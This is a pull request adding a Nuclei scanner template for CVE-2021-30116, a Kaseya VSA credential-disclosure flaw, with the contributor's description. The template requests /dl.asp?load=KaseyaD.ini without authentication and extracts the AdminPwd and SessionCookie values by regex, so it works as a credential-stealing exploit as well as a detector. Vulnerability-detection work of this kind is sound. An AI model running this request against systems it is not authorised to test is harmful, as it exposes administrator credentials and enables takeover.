### PR TITLE
Create CVE-2021-30116.yaml #12758

### DIFF
--- a/http/cves/2021/CVE-2021-30116.yaml
+++ b/http/cves/2021/CVE-2021-30116.yaml
@@ -1,0 +1,35 @@
+id: cve-2021-30116
+info:
+  name: Kaseya VSA Broken Authentication - Credential Disclosure
+  author: guiknx
+  severity: critical
+  description: |
+    Kaseya VSA <=9.5.7 allows unauthenticated credential disclosure via /dl.asp?load=KaseyaD.ini.
+    By acessing this endpoint, an attacker can retrieve the AdminPwd and SessionCookie values,
+    thereby bypassing authentication.
+  reference:
+    - https://secpod.com/blog/kaseya-vsa-zero-day-by-revil/
+  tags: 
+    - cve
+    - cve-2021-30116
+    - authentication
+    - ini
+
+http:
+  - name: "Attempt KaseyaD.ini download"
+    method: GET
+    path:
+      - "{{BaseURL}}/dl.asp?load=KaseyaD.ini"
+    matchers:
+      # procura pelas chaves no corpo
+      - type: word
+        words:
+          - "AdminPwd="
+          - "SessionCookie="
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'AdminPwd=([^\\r\\n]+)'
+          - 'SessionCookie=([^\\r\\n]+)'


### PR DESCRIPTION
### Template / PR Information
Adds a new HTTP template for CVE-2021-30116 under http/cves/2021.

This template detects unauthenticated credential disclosure via
/dl.asp?load=KaseyaD.ini and extracts AdminPwd and SessionCookie.

No version-based checks.

### Template Validation
I've validated this template locally?

 YES [X]
 NO [  ]

/claim #12758

**Template path:** `http/cves/2021/CVE-2021-30116.yaml`

**Proof-of-Concept artifacts** (attached below):  
- `Dockerfile`  
- `default.conf`  
- `KaseyaD.ini`  
[poc-kaseya.zip](https://github.com/user-attachments/files/21601739/poc-kaseya.zip)


**Debug data** (attached below):  
- `debug.log` (scan against the vulnerable POC)  [debug.log](https://github.com/user-attachments/files/21601710/debug.log)
- `clean.log` (scan against a clean environment)  [clean.log](https://github.com/user-attachments/files/21601709/clean.log)



**Note on HTTP protocol**:  
This CVE can only be exploited via HTTP GET on `/dl.asp?load=KaseyaD.ini`.  
Per the FAQ, HTTP-only templates are blocked by default but allowed here as a **critical** exception, since no other protocol applies.

**Additional References:**
[Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
[Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
[Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
[PD-Community Discord server](https://discord.gg/projectdiscovery)
